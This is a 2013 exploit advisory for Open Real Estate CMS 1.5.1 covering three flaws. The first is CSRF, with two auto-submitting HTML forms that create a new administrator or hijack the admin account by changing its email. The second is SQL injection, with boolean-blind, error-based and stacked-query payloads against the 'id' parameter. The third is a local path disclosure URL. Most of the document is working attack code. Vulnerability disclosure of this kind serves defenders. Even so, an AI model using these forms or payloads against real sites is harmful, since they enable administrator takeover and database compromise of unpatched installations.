Open Real Estate CMS 1.5.1 CSRF / Path Disclosure / SQL Injection

`###################################################################################################################################  
# Exploit Title: Open Real Estate CMS - Multiple vilnerabilities  
# Date: 2013 9 August  
# Exploit Author: Yashar shahinzadeh  
# Special thanks to Mormoroth  
# Credit goes for: http://y-shahinzadeh.ir & ha.cker.ir  
# Vendor Homepage: http://monoray.net/products/6-open-real-estate  
# Tested on: Linux & Windows, PHP 5.3.4  
# Affected Version : 1.5.1  
#  
# Contacts: { http://Twitter.com/YShahinzadeh , http://y-shahinzadeh.ir , http://Twitter.com/Mormoroth , http://mormoroth.ir }  
###################################################################################################################################  
  
Summary:  
========  
1. CSRF - Adding/Editing administrator account  
2. MySQL Injection  
3. Local path disclosure  
  
1. CSRF - Adding/Editing administrator account:  
===============================================  
Following exploits can be used against any site installed "Open Real Estate" CMS.   
  
<html>  
<body onload="submitForm()">  
<form name="myForm" id="myForm"  
action="http://localhost/OpenRealEstateV1.5.1_en/users/backend/main/create" method="post">  
<input type="hidden" name="User[username]" value="yashar">  
<input type="hidden" name="User[email]" value="[email protected]">  
<input type="hidden" name="User[phone]" value="09169189680">  
<input type="hidden" name="User[additional_info_en]" value="">  
<input type="hidden" name="User[password]" value="6658912">  
<input type="hidden" name="User[password_repeat]" value="6658912">  
<input type="hidden" name="yt0" value="">  
</form>  
<script type='text/javascript'>document.myForm.submit();</script>  
</html>  
  
Once the exploit is excuted, an email will send to attacker's email containing activation link. Additionally, for modifying, the administrator's ID is 1, so attack may change the administrator's email address, then he/she may use forget password option and go through administrator panel.  
  
<html>  
<body onload="submitForm()">  
<form name="myForm" id="myForm"  
action="http://localhost/OpenRealEstateV1.5.1_en/users/backend/main/update?id=1" method="post">  
<input type="hidden" name="User[username]" value="admin">  
<input type="hidden" name="User[email]" value="[email protected]">  
<input type="hidden" name="User[phone]" value="09169189680">  
<input type="hidden" name="User[additional_info_en]" value="">  
<input type="hidden" name="yt0" value="">  
</form>  
<script type='text/javascript'>document.myForm.submit();</script>  
</html>  
  
  
  
2. MySQL Injection:  
===================  
An attacker may conduct an attack by using MySQL injection after authentication so as to get higher access like uploading a shell script or etc... I just show the injection point and a small example of devastiating usage of it:  
  
http://localhost/OpenRealEstateV1.5.1_en/apartments/backend/main/view=[Injection payload]  
  
POC:   
---  
Place: GET  
Parameter: id  
Type: boolean-based blind  
Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)  
Payload: id=" RLIKE IF(7309=7309,0x4d7953514c,0x28) AND "ymsG"="ymsG  
  
Type: error-based  
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause  
Payload: id=" AND (SELECT 1454 FROM(SELECT COUNT(*),CONCAT(0x3a6b62653a,(SELECT (CASE WHEN (1454=1454) THEN 1 ELSE 0 END)),0x3a6c66753a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND "KASA"="KASA  
  
Type: stacked queries  
Title: MySQL > 5.0.11 stacked queries  
Payload: id="; SELECT SLEEP(5)--   
---  
  
  
  
3. Local path disclosure:  
=========================  
There are some pages that are big leads to knowing local path, the path is valuable and can be used in Injection and... I would give an instance only:  
  
http://localhost/OpenRealEstateV1.5.1_en/apartments/backend/main/view  
  
  
/** Yasshar shahinzadeh **/  
`